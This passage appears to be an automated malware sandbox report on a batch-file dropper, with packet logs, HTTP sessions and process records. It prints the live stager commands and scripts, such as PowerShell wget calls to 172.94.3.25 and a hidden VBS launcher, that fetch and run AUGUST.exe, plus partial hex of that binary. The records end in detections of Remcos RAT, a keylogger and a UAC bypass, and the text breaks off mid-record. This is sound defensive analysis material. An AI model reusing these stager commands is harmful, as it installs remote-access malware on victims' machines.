Sep 25, 2024 16:04:02.369785070 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.369813919 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.369839907 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.370871067 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.370883942 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.370889902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.370920897 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.406852961 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.406881094 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.406891108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.406903982 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.406953096 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.406981945 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.444621086 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.444634914 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.444649935 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.444672108 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.444689989 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.444700956 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.444713116 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.444724083 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.444761038 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.455142021 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.455153942 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.455190897 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.456657887 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.456670046 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.456713915 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.456747055 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.456779957 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.456790924 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.456803083 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.456835985 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.456891060 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.456899881 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.456927061 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.457010984 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.457021952 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.457032919 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.457067013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.457081079 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.457088947 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.457093954 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.457098961 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.457125902 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.458106041 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.458177090 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.458213091 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.485136032 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.485172033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.485184908 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.485205889 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.524223089 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.524266005 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.524281025 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.524291039 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.524296999 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.524307966 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.524346113 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.533085108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.533091068 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.533149004 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.534456968 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.534486055 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.534497976 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.534538984 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.534944057 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.534975052 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.534986019 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.535022020 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.535444975 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.535450935 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.535465002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.535496950 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.535541058 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.535547018 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.535557032 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.535562992 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.535589933 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.543622971 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.543627977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.543680906 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.573558092 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.573642969 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.680372953 CEST	49715	80	192.168.2.6	172.94.3.25

HTTP Request Dependency Graph

172.94.3.25

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49711	172.94.3.25	80	4304	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 16:03:14.889024973 CEST	163	OUT	GET /ffo.bat HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 172.94.3.25 Connection: Keep-Alive
Sep 25, 2024 16:03:16.695877075 CEST	396	IN	HTTP/1.1 200 OK Content-Length: 116 Last-Modified: Wed, 25 Sep 2024 10:10:11 GMT Content-Type: text/plain Date: Wed, 25 Sep 2024 14:03:16 GMT ETag: "df2e60705fdf43715c85c86652fee62b-1727259011-116" Accept-Ranges: bytes Server: WsgiDAV/4.3.3 Cheroot/10.0.1 Python/3.12.2 Data Raw: 40 65 63 68 6f 20 6f 66 66 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 32 2e 39 34 2e 33 2e 32 35 2f 41 55 47 55 53 54 2e 65 78 65 20 2d 4f 75 74 46 69 6c 65 20 25 41 50 50 44 41 54 41 25 2f 41 55 47 55 53 54 2e 65 78 65 0d 0a 73 74 61 72 74 20 25 41 50 50 44 41 54 41 25 2f 41 55 47 55 53 54 2e 65 78 65 0d 0a Data Ascii: @echo offpowershell wget http://172.94.3.25/AUGUST.exe -OutFile %APPDATA%/AUGUST.exestart %APPDATA%/AUGUST.exe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49714	172.94.3.25	80	3968	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 16:03:17.759859085 CEST	162	OUT	GET /hi.vbs HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 172.94.3.25 Connection: Keep-Alive
Sep 25, 2024 16:03:19.699534893 CEST	420	IN	HTTP/1.1 200 OK Content-Length: 126 Last-Modified: Wed, 25 Sep 2024 10:18:03 GMT Content-Type: application/octet-stream Date: Wed, 25 Sep 2024 14:03:19 GMT ETag: "5374c228c78d8b24803c35ae359f5b7e-1727259483-126" Accept-Ranges: bytes Server: WsgiDAV/4.3.3 Cheroot/10.0.1 Python/3.12.2 Data Raw: 53 65 74 20 57 73 68 53 68 65 6c 6c 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 20 0d 0a 57 73 68 53 68 65 6c 6c 2e 52 75 6e 20 63 68 72 28 33 34 29 20 26 20 22 25 41 50 50 44 41 54 41 25 2f 66 66 6f 2e 62 61 74 22 20 26 20 43 68 72 28 33 34 29 2c 20 30 0d 0a 53 65 74 20 57 73 68 53 68 65 6c 6c 20 3d 20 4e 6f 74 68 69 6e 67 Data Ascii: Set WshShell = CreateObject("WScript.Shell") WshShell.Run chr(34) & "%APPDATA%/ffo.bat" & Chr(34), 0Set WshShell = Nothing

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49715	172.94.3.25	80	5936	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 16:03:21.855631113 CEST	166	OUT	GET /AUGUST.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 172.94.3.25 Connection: Keep-Alive
Sep 25, 2024 16:03:22.714893103 CEST	1236	IN	HTTP/1.1 200 OK Content-Length: 4809996 Last-Modified: Wed, 25 Sep 2024 11:52:30 GMT Content-Type: application/x-msdownload Date: Wed, 25 Sep 2024 14:03:22 GMT ETag: "f30293f7a768b837cdb37fc8b138e7a1-1727265150-4809996" Accept-Ranges: bytes Server: WsgiDAV/4.3.3 Cheroot/10.0.1 Python/3.12.2 Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 7e f8 26 4c 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 14 01 00 00 c8 01 00 00 00 00 00 ef 1d 01 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 03 00 00 02 00 00 02 33 03 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 50 01 00 b4 00 00 00 00 a0 01 00 04 8d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ`@`!L!Require Windows$PEL~&L0@03P0.text `.rdata002@@.data,)pH@.rsrcP@@USVWj'uv=`2A6PPe~v8^3h3APPPp1AEE;FrP,fY-jt1At$l39wAt@9D$tt$Ph5wA2A3D$`\|$u@3D$VtPQ^T$Vt$fBBFFfu^L$3f9t@f<AuS\$VC;^tLW3jZQ39FY~9F~fAfG@;F\|6YF>f$G^_^[UQQlwAuVjjEP5wA
Sep 25, 2024 16:03:22.714921951 CEST	466	IN	Data Raw: ff 15 6c 31 41 00 85 c0 74 3e 8b 45 fc 3b 45 10 77 36 72 08 8b 45 f8 3b 45 0c 73 2c 6a 2a e8 d4 0d 00 00 50 e8 48 65 00 00 83 f8 01 59 59 74 11 c7 05 28 77 41 00 6a 00 00 00 b8 05 40 00 80 eb 20 83 0d 6c 77 41 00 01 8d 45 0c 50 6a 00 68 01 80 00 Data Ascii: l1At>E;Ew6rE;Es,j*PHeYYt(wAj@ lwAEPjh5wA2A3D$t(wA@:Vt$W~ ?tNF0PKu~tv<v$h1A_3^UVud1A}juuv$j}iuv$jjduVP^]
Sep 25, 2024 16:03:22.714935064 CEST	1236	IN	Data Raw: ff 77 04 e8 ab fd ff ff ff 37 ff 36 e8 72 fd ff ff 8b 47 04 59 59 89 46 04 5f 8b c6 5e c2 04 00 53 8b 5c 24 08 56 57 8b 79 08 8b f7 2b 71 04 4e 3b de 7e 30 83 ff 40 7e 09 8b c7 99 2b c2 d1 f8 eb 0f 33 c0 83 ff 08 0f 9e c0 48 83 e0 0c 83 c0 04 8d Data Ascii: w76rGYYF_^S\$VWy+qN;~0@~+3H0;}+WO_^[VW\|$wF7APGFYY_^V3jFF^VjeFfT$fAFFf$A^UuMuMu
Sep 25, 2024 16:03:22.714946985 CEST	1236	IN	Data Raw: 89 78 10 89 78 14 e8 fc c2 00 00 84 c0 0f 85 b0 00 00 00 ff 15 50 31 41 00 53 8d 4d e4 89 45 08 e8 86 fa ff ff 8d 45 e4 50 e8 e0 14 00 00 3b c7 59 7d 3b ff 75 08 8b 06 6a 6a 56 ff 50 20 ff 75 e4 8b f0 e8 6a 03 01 00 8b 45 0c 3b c7 59 74 06 8b 08 Data Ascii: xxP1ASMEEP;Y};ujjVP ujE;YtPQMuLYMf<AuEYujhVPFjSHxxbuP1APjjVS uYuMVnEM0#E8>P1APji
Sep 25, 2024 16:03:22.714963913 CEST	328	IN	Data Raw: 45 d4 50 6a 18 ff 75 08 ff 15 20 30 41 00 57 53 ff 75 d8 ff d6 57 53 ff 75 dc 89 45 f4 ff d6 ff 75 fc 8b 35 1c 30 41 00 89 45 f8 ff d6 ff 75 fc 8b d8 ff d6 ff 75 08 8b 35 18 30 41 00 53 8b f8 ff d6 ff 75 f8 89 45 f0 ff 75 f4 ff 75 fc ff 15 14 30 Data Ascii: EPju 0AWSuWSuEu50AEuu50ASuEuu0APWjWE0Ah u3uPPSuuPPW0AjW0AuESuW500ASWujD2AEuWD2AWWWWu2A_^[UhSVWj@EPu2A-
Sep 25, 2024 16:03:22.714975119 CEST	1236	IN	Data Raw: 7d f8 10 0f 82 cf 00 00 00 ff 75 f8 6a 40 ff 15 70 30 41 00 ff 75 f8 8b f8 53 57 e8 8e fd 00 00 83 c4 0c 56 ff 15 00 33 41 00 8d 45 f4 50 56 57 ff 15 04 33 41 00 85 c0 0f 85 93 00 00 00 39 75 f4 0f 84 8a 00 00 00 8d 45 f0 50 68 14 4c 41 00 56 56 Data Ascii: }uj@p0AuSWV3AEPVW3A9uEPhLAVVu2AEPQWl0AE;tfURuPQ9ut?uYMQjPE 0AjuuVVVu2AuVhru2AEPQ3@Wl0A3_^[f=,wAuD0Af,w
Sep 25, 2024 16:03:22.714987993 CEST	224	IN	Data Raw: 70 ff ff ff 5f 5e 5b c2 04 00 8b 01 8b 51 04 8b 4c 24 08 2b d1 8d 54 12 02 8d 0c 48 52 51 8b 4c 24 0c 8d 04 48 50 ff 15 d8 31 41 00 83 c4 0c c2 08 00 8b 54 24 04 56 8b 74 24 0c 8b c2 8a 0e 88 0a 42 46 84 c9 75 f6 5e c3 56 eb 0d 8b 08 8b 32 80 3c Data Ascii: p_^[QL$+THRQL$HP1AT$Vt$BFu^V2<1tA;J\|2^PpA^$u;ut;B\|2S\$VWu33\|$Gt$P0AtF;w\|3_^[t
Sep 25, 2024 16:03:22.714999914 CEST	1236	IN	Data Raw: 33 8b 47 0c 8b 04 b0 eb ee 56 8b f1 ff 76 0c e8 ce f7 00 00 ff 36 e8 c7 f7 00 00 59 59 5e c3 ff 74 24 0c ff 74 24 0c ff 74 24 0c e8 91 ff ff ff 83 c4 0c 85 c0 74 04 8b 40 0c c3 33 c0 c3 55 8b ec 83 ec 40 83 7d 08 00 75 04 33 c0 c9 c3 f6 05 6c 77 Data Ascii: 3GVv6YY^t$t$t$t@3U@}u3lwAE@uEEP0At7M3;w.rE;Es$j+PoRYYtlwAlwA3@t$Yujht$j0At$jYu%1AV3Wt$FF
Sep 25, 2024 16:03:22.715173960 CEST	1236	IN	Data Raw: 87 00 00 00 8b 45 f8 8a 00 3a c3 88 45 e0 74 7f ff 75 e0 8b 4d 14 e8 35 fd ff ff 47 ff 45 f8 eb bc 2b 45 f4 3b f8 77 23 ff 75 f4 ff 75 0c ff 75 f8 e8 ea f2 00 00 83 c4 0c 85 c0 75 de 8b 45 f4 03 f8 01 45 f8 c6 45 ff 01 eb 92 2b f7 01 7d ec 56 8d Data Ascii: E:EtuM5GE+E;w#uuuuEEE+}V=]PP1A9]w}"M39Y2_^[UQM&=t uMMtEU=wAujzVWM
Sep 25, 2024 16:03:22.715188026 CEST	1236	IN	Data Raw: ec 74 53 56 8b 75 08 57 6a 40 8d 45 8c 50 56 ff 15 e0 32 41 00 85 c0 74 49 68 d0 33 41 00 8d 45 8c 50 ff 15 74 30 41 00 85 c0 75 36 6a f0 56 ff 15 e4 32 41 00 a8 0e 75 29 8d 45 e8 56 50 e8 76 ff ff ff 6a 05 68 80 34 41 00 ff 75 e8 e8 6f ec ff ff Data Ascii: tSVuWj@EPV2AtIh3AEPt0Au6jV2Au)EVPvjh4AuotuY3_^[Vd2A3;Etht4AT0AEPVQYYV2Ah0AE+ESSWuPE+EPuuhPh\3Ah\4AST2A;{V<2A52ASj"hY
Sep 25, 2024 16:03:22.719903946 CEST	1236	IN	Data Raw: 10 00 74 3f 6a 00 ff 75 a4 ff 75 0c e8 34 f1 ff ff 8b f8 83 c4 0c 85 ff 74 29 68 a0 34 41 00 ff 75 a4 ff d6 85 c0 74 1b 68 8c 34 41 00 ff 75 a4 ff d6 85 c0 74 0d ff 75 b0 8d 4f 0c e8 50 e0 ff ff eb 0c 8b 4d 0c 8d 45 a4 50 e8 85 fc ff ff 8d 4d a4 Data Ascii: t?juu4t)h4Auth4AutuOPMEPM6uAuuSMu&uuMEP0MuY_^[USVW}W0AWME39uVMD_f

Target ID:	0
Start time:	10:03:07
Start date:	25/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\55Ka50lb6Z.bat" "
Imagebase:	0x7ff73b340000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:03:07
Start date:	25/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:03:07
Start date:	25/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:03:15
Start date:	25/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:03:18
Start date:	25/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c C:\Users\user\AppData\Roaming/hi.vbs
Imagebase:	0x7ff73b340000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:03:18
Start date:	25/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:03:18
Start date:	25/09/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs"
Imagebase:	0x7ff601170000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:03:19
Start date:	25/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "
Imagebase:	0x7ff73b340000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:03:19
Start date:	25/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:03:19
Start date:	25/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:04:01
Start date:	25/09/2024
Path:	C:\Users\user\AppData\Roaming\AUGUST.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming/AUGUST.exe
Imagebase:	0x400000
File size:	4'809'996 bytes
MD5 hash:	25860926414BF43383246F7C773A8D6C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000E.00000003.2720616296.00000000026D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	10:04:02
Start date:	25/09/2024
Path:	C:\Users\user\DZIPR.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\DZIPR.exe"
Imagebase:	0x400000
File size:	8'767'704 bytes
MD5 hash:	EC9CE1D67F98072281015C7726FBA245
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000F.00000000.2725735029.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\DZIPR.exe, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:04:04
Start date:	25/09/2024
Path:	C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Imagebase:	0x400000
File size:	8'767'704 bytes
MD5 hash:	EC9CE1D67F98072281015C7726FBA245
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:04:04
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	10:04:05
Start date:	25/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	10:04:14
Start date:	25/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	10:04:21
Start date:	25/09/2024
Path:	C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Imagebase:	0x400000
File size:	8'767'704 bytes
